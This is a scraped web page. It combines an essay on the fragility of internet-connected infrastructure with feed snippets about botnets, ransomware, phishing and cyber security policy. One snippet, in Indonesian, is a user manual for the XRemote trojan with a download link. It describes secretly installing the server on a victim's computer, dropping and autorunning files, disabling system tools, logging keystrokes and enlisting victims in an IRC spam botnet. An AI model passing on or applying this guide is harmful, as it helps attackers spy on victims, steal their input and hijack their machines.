Your juicers? Whatever, we can laugh at that because it seems ludicrous, but it’s not. A typical US city only has three days of food within the city limits, because the Internet has enabled just-in-time delivery of foodstuffs. Economic optimization within a network tends to imply specialization, which means that even those lovely rural communities that in theory grow their own food don’t grow balanced diets locally. And you’re laughing at an Internet connected juicer? Your juicer is already Internet-connected. If that goes down, you don’t get any more juice! It’s just connected in a way you can’t see.

Now that gas stations play video ads on a loop above the station, now that every cash register is replaced with an Internet-connected device, losing Internet means no gas and no groceries. No gas means no trucks delivering the groceries. Especially if we make them into self-driving trucks! We think of critical infrastructure in terms of government-owned or controlled utilities… but the food trucking fleet is “critical infrastructure.” It’s owned by a massive patchwork of private entities, and actually is networked into the air fleet and the shipping fleet as well via databases of shipping container IDs. Wanna paralyze the world economy? Corrupt that ID database.

If you have a “smart wifi lightbulb” that’s critical infrastructure because it can be owned by a botnet and used to attack. Hyperbolic? In a world where we take actual damage when something digital is attacked, any CPU is basically a weapon, and leaving Internet connected CPUs unattended is basically leaving armory doors open.

Take the example of the solar panels on my home. They are similar to the IoT lightbulb, but the point is more pertinent.

The solar system controller phones home in a variety of ways to provide information to me on how it is performing, but also to inform the grid about the power I am generating . Because there is no battery in my home, any excess power beyond my consumption must be fed back to the grid. Should solar panels feed more power into the grid than the grid can actually handle, this power must be offloaded elsewhere — typically California pays neighboring states to take it. If the power utilities failed to do so, the grid would actually explode. Literally. Explode. The result could be a cascading power failure covering several states.

By connecting this solar controller to the Internet, we have actually put a portion of the critical infrastructure of the entire power grid in the cloud where it is vulnerable. Is that the most direct vector of attack? No, of course not. I suspect you can’t actually tell my solar controller to do anything much, it’s pretty stupid as smart devices go. But I have every expectation that someone wants to make direct bidirectional control possible, because it’s “cool.” (Presumably, regulation is stopping them. Yay, regulation. Please don’t let Congress notice your existence).

The only difference between my solar panels and a hydroelectric dam is scale. To the grid, they are all just nodes, with differing power outputs. Yes, you could cut off my panel. You could cut off a hydroelectric plant too. The issue isn’t whether the node in the network is severable. The issue is whether we are increasing the fragility of the system and thereby increasing the likelihood of cascade effects.

Network connecting solar panels opens the possibility of things like malware attacks designed to cause them all to misreport, say… luckily, the electrical grid has redundancies, fuses, switches. Physical lines to sever. We can measure power flows independent of using the Internet. So let’s consider another example.

Our medical systems have terrible Internet security… MRI machines you can connect to with USB that still have “admin:password” to gain root access. That’s horrifying, sure, but that’s not an attack at scale. More frightening: we’re busily uploading all our medical records to the cloud. Take down that cloud, and no patients can be treated, because nobody will know what they have, what meds they are on. Software swallows your insulin pumps and your pacemakers. To kill people, all you need is to hack that database, or simply erase it or block access to it. After all, we don’t tend to realize that in an Internet of Things, humans are just Things too.

As this software monster has encroached on stuff like election systems, the common reaction has been to go back to paper. So let’s consider a less obvious example. We should be going back to paper for our libraries too! We’ve outsourced so much of our knowledge to digital that the amount of knowledge available in analog has dropped notably. There are less librarians in the fewer libraries with smaller collections than there used to be. If the net goes down, how much reference material is simply not accessible that was thirty years ago? Google Search is “critical cultural infrastructure.” How much redundancy do we actually have? Could a disconnected town actually educate its children?

How critical is Google as a whole? If Google went down for a month, I am pretty sure we would see worldwide economic collapse. How much of the world economy passes through Google hosting? How much of it is in GMail? How much is dependent on Google Search, Google Images, Google Docs? The answer is a LOT. And because financial systems are now also JIT, ten thousand corporate blips where real estate agencies and local car washes and a huge pile of software companies and a gaggle of universities and so on are suddenly 100% unable to function digitally (no payroll! no insurance verification!) would absolutely have ripple effects into their suppliers and their customers, and thence to the worldwide economic market. Because interconnection without redundancy increases odds of cascades.

It’s actually NORMAL for complex systems to go through collapse cascades. It is part of how they grow and develop. We just won’t like it when one happens to us.

In the current economic climate, there’s this romance with the idea of monopoly. VCs like Peter Thiel speak approvingly of not funding anything unless it has a shot at monopoly. Some great achievements of technology probably wouldn’t have happened without the monopolies that are currently enjoyed by most of the big names in tech. The usual arguments against monopolies are generally around how they stifle competition and hurt consumers. Consumers are OK with the tech monopolies because they largely see benefits right now.

But the single biggest downside to these monopolies is actually lack of redundancy. If AWS went down for longer than the brief interval it did a while back, is there even enough capacity elsewhere? I have no idea — probably there is — but what happens when instead of it being a minor inconvenience it’s actually gone? That’s more like losing the hydroelectric dam than losing the solar panel.

We should be thinking now about how we create redundancy, resilience, in all these systems. “The cloud” isn’t it. Big Data isn’t what we need. Small replicated data is.

This is not solely a technological problem. I’ve often wanted to sit down with Mark Zuckerberg and argue with him about Facebook. It is premised on the notion that “connecting everyone” is an unmitigated good. But it’s not, and for the exact same reasons as the above. We don’t have opinions, we share the opinions of those we know. We think and decide things like politics via viral mechanisms — the old school meaning of “meme.” Nodes can be infected, can even be high-profile nodes, and they will have cascading effects on far larger populations. Actors who don’t understand what they’re doing — like say, billionaire political activists — can basically release ideological malware into the population not realizing the cascade effects, because predicting chaotic systems is hard, and by connecting everyone we’re actually intentionally removing the firewalls and the fuses and the airlocks. Attacks on the idea of the value of expertise are like taking down the immune system while giving the patient a cold.

Right now, we’ve got shit in the water supply.

It’s possible the water gets so dirty that no one can drink from it anymore. This would be all of us saying the net is too dangerous to connect to.

It’s possible we all keep guzzling away and all die.

Or maybe we can start getting smart and diversifying our water supply, getting smarter about cross-contamination, drill separate wells and avoid tapping the same water table.

This sort of problem is what birthed modern epidemiology, long ago, when Dr. Snow figured out a cholera epidemic’s source in London. Facebook is like all of us drinking from the same well.

In general, I’ve come to believe that the norm for systems is to interconnect, to form larger networks, and for sub-areas in that network to evolve into specialization. In the process, they lose autonomy. Eventually, they end up as appendages — sometimes vital, sometimes optional — to the larger organism. The larger network is almost certainly more powerful, more likely to survive, capable of greater things. But when it goes, everything in it goes too. Bits and bobs survive, or dissolve back into constituent parts. Anything over-specialized at that point is almost certainly going to perish, to be used as building blocks for a different network.

We’re fine with this when we are the larger network. Paring our fingernails is no big deal, and the fingernails don’t get a vote. When we are in the larger network, though… it’s likely to our individual benefit not to permit it to reach too high a level of interconnection, specialization and sophistication. It simply means we’re each more vulnerable to the failure of some strongly interconnected node way up the line — just like the tendon in our toe is screwed if our nervous system gets shut down.

Anyway. Pay attention to Petya. Think about how much of your life is online. Assume every connected service will some day shutter. Consider your personal strategies, and contemplate the larger scale. I’m not a radical individualist, not by a long shot… not the sort to say we should hoard gold and have self-sufficient farms in our back yards. But I am someone who more than once has built entire complex communities with hundreds of thousands of nodes — technological and human nodes — and watched them fall prey to single points of failure.

This isn’t about cute Internet of Shit jokes anymore. It’s about how gangrene spreads.


          For sale - Fortinet fortigate 300C fg-300C Firewall Security... - $740   

Plano TX, United States
...status Version: fortigate-300C v5.2.6,build0711,160129 (ga) Virus-db: ... :31) Extended db: ... :46) ips-db: ... :21) ips-etdb: ... :00) Serial-Number: fg300C ... Botnet db: ... :51) bios version: ... ...
ebay.com

          AVG LinkScanner rivela le minacce prima che raggiungano il computer   
Infettare pagine web è il modo più recente utilizzato da hacker e spammer per inserire malware nei computer con l’obiettivo di rubare password o far finire i computer in una botnet e per evitare di essere scoperti, infettano una determinata
          Know About Zombie Computer Or Botnet Attacked By Zombie Virus   
Know-About-Zombie-Computer-Or-Botnet-Attacked-By-Zombie-VirusIf you have seen Hollywood horror movie Zombieland, Resident Evil or Dead Snow etc., then you have a rough idea about zombie. Zombie is basically people, who was healthy once and who is infected by virus. According to movies, they can infect any other healthy people or kill them. Scientists create different viruses and zombies […]
          Locky 2? Jaff Ransomware Launched from Necurs Botnet   

Despite WannaCrypt grabbing all the headlines, it is far from being the only ransomware in circulation. A second wave of Jaff ransomware is now being distributed by the stealthy Necurs botnet. Starting on Monday, May 8 (around 9:30 UTC), the Necurs botnet was harnessed to distribute a new Locky-style email campaign with an initial global outbreak of around 20 million emails. Cyren saw and blocked about 50 million Jaff emails in less than 24 hours during a subsequent wave, and on Thursday approximately 65 million Jaff emails were detected and blocked.


          Google Docs Phishing Attack Worms Its Way In   

Repeatedly referred to as “massive,” the Google Docs attack which has been the talk of the security blogosphere and even mainstream media this past week appears to have sent invitation emails to an estimated “less than 0.1%” of Gmail users, according to Google’s own statement, which is not a particularly massive fraction. Although that still could signify over one million users, in terms of sheer volume it’s not a lot compared to billions of ransomware emails being pumped out by a botnet in a single day.


          Krebs Exposed IoT Botnet Mastermind — Think That's the End?   

For several years, cybersecurity professionals have been predicting an impending malware onslaught, originating from Internet of Things (IoT) devices—“smart” everyday household items that can connect to the Internet, such as refrigerators, WiFi routers, DVRs, baby monitors, security cameras, thermostats, and so forth.


          Botnets rising   

The year 2016 was certainly notable for Locky and the rise of ransomware, but these last months our attention has been drawn to a fundamental element of the underlying criminal cyber infrastructure—botnets.


          New Threat Report: Everything you need to know about botnets   

Cyren announces the release of the comprehensive cybersecurity report Botnets: The Clone Army of Cybercrime. This detailed look at a fundamental component of cybercrime infrastructure covers a wide range of botnet-specific topics, ranging from the basics of botnet architecture to in-depth analyses of botnet creation and evasion techniques.


          On Demand Webinar - Botnets: the Clone Armies of Cybercrime   

Last week we hosted a webinar titled "Botnets: The Clone Armies of Cybercrime." Cyren security researchers, Avi Turiel and Geffen Tzur, discussed the history and current state of botnets and shared insights on malicious bot behavior, how to spot it, and what you can do to protect your organization.


          Bitcoin Phishing Targets Users via Google AdWords   

As we have pointed out several times, cybercrime is a business, and running a malware or phishing campaign does require some financial investment by the bad actors. Rental of a botnets, purchase of exploit kits, and acquisition of compromised site lists are all expenses that need to be covered by the campaign.

A recent phishing attack detected by CYREN clearly shows this investment, as the attack vector is pay-per-click advertising via Google AdWords.


          Xtreme Remote   


Image

download File

1.Instalasi
XRemote terdiri dari dua bagian, yaitu : XRemote.exe (Pengontrol) dan IEXPLORER.exe (Trojan). XRemote adalah bagian yang harus anda jalankan di komputer anda sedangkan IEXPLORER.exe adalah bagian yang harus anda jalankan di komputer target.

Instalasi XRemote.exe

* Ekstrak semua file Client.zip ke directory komputer anda sesuai keinginan. Jalankan XRemote.exe

Instalasi IEXPLORER.exe

* Ekstrak semua file Server.zip ke directory komputer target sesuai keinginan. Jalankan IEXPLORER.exe.
* Server ini tidak terlihat di monitor komputer korban.
* Catatan: Komputer pengontrol dan komputer target terhubung di dalam LAN (Local
* Area Network) yang sama ataupun didalam satu kesatuan sistem jaringan yang sama.

2.Koneksi ke komputer target
Image
lik Show Commands dan anda akan melihat tampilan penuh dari XRemote. Anda perlu melakukan koneksi ke komputer korban (Saya anggap anda sudah menginstalasikan trojan ke komputer korban sudah menjalankan trojan tersebut).

Didalam sebuah Jaringan seperti LAN atau Wireless LAN memiliki beberapa komputer client dengan alamat IP yang berbeda. Alamat IP didalam sebuah jaringan umumnya adalah 192.168.0.XX atau 10.10.10.XX. Jika anda tidak mengetahui secara pasti alamat IP korban, scan terlebih dahulu di menu Xremote Server Scanner. Klik Start dan lihat daftar komputer aktif yang telah terinfeksi oleh trojan Scanner akan menunjukkan komputer dengan alamat IP yang telah terinfeksi oleh server XRemote. Isi alamat IP korban dan klik connect untuk dapat mengontrol komputer target dari komputer anda. Jika komputer anda telah konek ke komputer target, maka anda akan melihat kata “connected” di kolom status.

3. FUNGSI DAN OPSI REMOTER
3.1 Ghost Remote
Image
Berikut dibawah ini adalah fungsi yang dapat
dikontrol pada komputer korban.
- Open CD-ROM – CLOSE CD-ROM
Buka CD-ROM – Tutup CD-ROM
- Hide Taskbar – Show Taskbar
Sembunyikan Taskbar – Kembalikan Taskbar yang hilang
- Ram Nuker – Stop Ram Nuker
Menghabiskan resource memory RAM – menghentikan fungsi RAM nuker
- Lock The Mouse – Free The Mouse
Mengunci fungsi mouse – menghentikan penguncian mouse
- Disable Click – Enable Click
Mematikan fungsi klik pada mouse – mengembalikan fungsi klik pada mouse
- Shutdown PC – Reboot PC
Matikan komputer korban – Reboot komputer korban
- Disable Cpanel – Enable Cpanel
Melarang fungsi Control Panel – Mengembalikan Fungsi Control Panel
- Disable Run Menu – Enable Run Menu
Melarang fungsi RUN – Mengembalikan Fungsi RUN
- Disable Find Menu – Enable Find Menu
Melarang fungsi FIND – Mengembalikan Fungsi FIND – Ghost Message – Close Message
Menampilkan Peringatan ke komputer korban bahwa dia telah di-Remote – menutup pesan Ghost Message
- Disable Regedit – Enable Regedit
Melarang fungsi REGEDIT – Mengembalikan fungsi REGEDIT
- Disable TaskMan – Enable TaskMan
Melarang fungsi Task Manager – Mengembalikan fungsi Task Manager
- Scr Injection – BlackEnd
Menginjeksi kalimat screen saver 3Dtext dan marquee – Menghitamkan menuWindows

3.2 Injection / Remote Execution
Image
Injection / Remote Execution adalah menu yang menyertakan fungsi untuk memasukkan file, menjalankan program , membuat registry string dan mematikan proses pada komputer korban.

Menyusupkan file ke komputer korban
Setelah anda berhasil melakukan koneksi ke komputer korban, anda dapat
mengirimkan file secara diam-diam ke komputer target. Pilih dahulu file yang terdapat di komputer anda (YOUR DRIVE) dan tentukan lokasi di komputer korban (REMOTE EXECUTION – PATH:\MYFILE.EXE) . Cth : C:\filesaya.exe .lalu klik SEND Maka anda telah mengirimkan file filesaya.exe ke komputer korban dimana lokasi virus.exe terdapat di C:\ .

Autorun file hasil susupan di komputer korban
Setelah anda tadi telah menyusupkan filesaya.exe , anda kemudian bisa menentukan apakah filesaya.exe nantinya akan dijalankan setiap kali komputer korban startup. Klik AUTORUN jika anda menginginkan filesaya.exe aktif setiap kali komputer korban dihidupkan.

Menjalankan program di komputer korban
Anda bisa menjalankan program/file music, file gambar, file text di komputer korban. Isi secara lengkap PATH:\REMOTEFILE.EXE . Cth : C:\filesaya.exe dan klik RUN ,maka filesaya.exe akan dieksekusi di komputer korban. Jika anda ingin menjalankan winamp secara remote pada komputer korban, isi kolom menjadi C:\programfiles\winamp\winamp.exe .

Mematikan proses di komputer korban
Anda juga dapat mematikan proses di komputer korban. Isi nama proses yang akan dimatikan di kolom REMOTEFILE.EXE lalu klik KILL misalnya, komputer korban sedang menjalankan Microsoft Word dan anda ingin menutupnya secara remote dari komputer anda. Isi dengan WINWORD.exe dan eksekusikan perintah KILL.

Membuat komputer korban membacakan teks yang anda kirimkan
Membuat komputer korban berbicara sesuka hati anda merupakan salah satu fungsi tambahan yang dimiliki oleh XRemote. Cukup ketikkan kata-kata di kolom dan klik tombol GODSPEAK. Maka komputer korban akan menjadi sebuah mesin yang cerewet.

3.3 Keylogger
Image
Seperti namanya, Key = kunci (tombol yang dapat anda ketik di keyboard) dan logger = pencatat/perekam. Keylogger dapat diartikan “Kemampuan sebuah program untuk merekam setiap aktifitas yang dilakukan user diatas keyboard”.
Ketika server trojan XRemote aktif, fungsi keylogger tidak difungsikan pada komoyter korban. Anda dapat mengaktifkan ataupun mematikan keylogger sesuai kehendak.
Klik : START KEYLOGGER dan biarkan korban beraktifitas beberapa saat. Jika anda ingin melihat apa yang telah diketik oleh korban Klik GET LOG FILE, maka trojan akan mengirimkan catatan keylogger ke komputer anda. Klik CLEAR untuk membersihkan log file dan STOP KEYLOGGER untuk menonaktifkan fungsi keylogger.

Aktifitas yang akan dicatat oleh Trojan adalah sebagai berikut :
- Aplikasi yang dijalankan korban
- Karakter yang diketik dengan keyboard oleh korban
3.4. IRC Botnet
Image
IRC botnet adalah fungsi untuk mengendalikan komputer korban melalui server IRC .
Fungsi ini bersifat massal, artinya anda tidak hanya dapat mengendalikan sebuah komputer saja. Anda dapat mengendalikan seluruh korban trojan XRemote di dalam channel IRC.
Untuk dapat menjalankan fungsi ini, tentunya syarat mutlak adalah anda dan korban harus dalam keadaan terkoneksi ke internet. Klik BOTNET ON untuk mengaktifkan Botnet di komputer korban. Anda juga harus konek ke irc server, isi nick anda di kolom sesuai keinginan dan Klik CONNECT . Baik anda maupun korban akan masuk ke #H.A.C.K irc.dal.net.

Fungsi Command :
!IDENT = memerintahkan Botnet untuk mengidentifikasi diri
!CLEAR = menghapus log file Botnet
!SPAM = memerintahkan Botnet untuk masuk ke channel-channel besar dan melakukan spam
!NOSPAM = memerintahkan Botnet untuk keluar dari ke channel-channel besar.
!CNICK = memerintahkan Botnet untuk menganti nick
!MAINROOM = memerintahkan Botnet untuk join ke channel afiliasi

credit : Indonesia Hacker


          The Evolution of Cybercrime and What It Means for Data Security   
Cybercrime is now an industry unto itself. And, just as any industry evolves, so does the cybercrime industry. This industry is built upon enterprise data. Granted, there is a ready underworld supply chain and market for vulnerabilities, attack kits, botnets, APTs, phishing-as-a-service, ransomware-as-a-service and other evolving tools. Cybercriminals generate significant sums of money by trading […]
          IT Minister Ravi Shankar Prasad asks PSUs to be vigilant while securing India's digital infrastructure   
IT Minister Ravi Shankar Prasad today exhorted state-owned firms to be "vigilant" while securing digital infrastructure even as he emphasized that cyber attacks should not be a deterrent to building information superhighways in India.

His comments come against the backdrop of a global malware attack that has disrupted functioning at some central banks and many large corporations in Europe. In India, the attack has impacted the functioning of one of the terminals of India's largest container port JNPT .

Likening the information superhighway to a national highway, Prasad said that while accidents may occur on roads at times, it only means that users have to be more cautious."On the national highways there are accidents...you have to drive carefully, wear seat belts, not drink and drive...but how can you say that there should be no national highways because accidents occur. The same is with information highway...," he said.

Proactive measures have already been initiated following the latest attack and the government is keeping a close watch on the entire situation, he said, maintaining that there is no large-scale impact on India yet.

The minister was speaking at the national convention on 'Digitization: Opportunities and Challenges'.Terming cyber security as extremely important, he referred to the Prime Minister having stated that cyber war is like a bloodless war.

"We have got Cyber Swachhta Kendra. If you have any problem, you can approach them immediately...the Cyber Co-ordination Centre is going to be set up very soon," Prasad said listing out the measures taken by the government to secure the IT systems against cyber attacks.

Cyber Swachhta Kendra or the Botnet Cleaning and Malware Analysis Centre, is part of the Digital India initiative and focuses on detection, cleaning and securing systems from botnet infections. "I would like the PSUs (public sector units) to be particularly vigilant in ensuring cyber security in their full digital ecosystem," Prasad said.

He said that the audit practices have to be re-assessed in view of the digital transformation unfolding across the country.On digital payments, he said that the BHIM app has been downloaded by two crore people.

"India's digital economy is going to be a great area of growth... A recent BCG Group and Google study said that in five years India's digital payment itself is going to become USD 500 billion industry," he added.

          NYTimes Article on CAPTCHAs   
The New York Times is running an article today on CAPTCHAs. The article really misses some key points. For example, it talks about the CAPTCHAs on YouTube. YouTube's CAPTCHA is really, really bad. The CAPTCHA is mis-designed, using different colors to attempt to provide security. I can't imagine solving this as a color blind user, it must be nearly impossible. Most CAPTCHA providers have migrated to using a monochrome CAPTCHA (for example Google, Yahoo and MSN). The way to create a challenging CAPTCHA today is to make segmentation difficult. This can be achieved without causing as much pain for humans.

Then there's this Asirra thing. Did anybody from the Times actually try it? Here's an unscalled image of what it looks like:

Now, you can hover over an image for a larger version. But now to solve one of these CAPTCHAs, you've got to hover over 12 images, and make a decision on each. Asirra is undeniably cute, but it's not clear that it's all that much easier than the current, well designed, CAPTCHAs. The security of Asirra is also unclear. It'd be interesting to see what happens if Asirra is ever put in front of a high value target (something that can be used to send email, host pagerank-gaining links, or host porn/warez). I have a feeling that some spammer would find a way to abuse a botnet and take advantage of some of the design issues in Asirra.

          Two-Factor Authentication: What it is and Why You Should be Using it Now   

Not too long ago, WordPress sites around the world started getting attacked with automated botnet traffic trying to brute force admin passwords. The other day, the official Twitter account of the Associated Press was hacked. Last year, Wired reporter Mat Honan was hacked when his Amazon account was compromised. That compromise allowed an attacker to …

The post Two-Factor Authentication: What it is and Why You Should be Using it Now appeared first on Technosailor.com.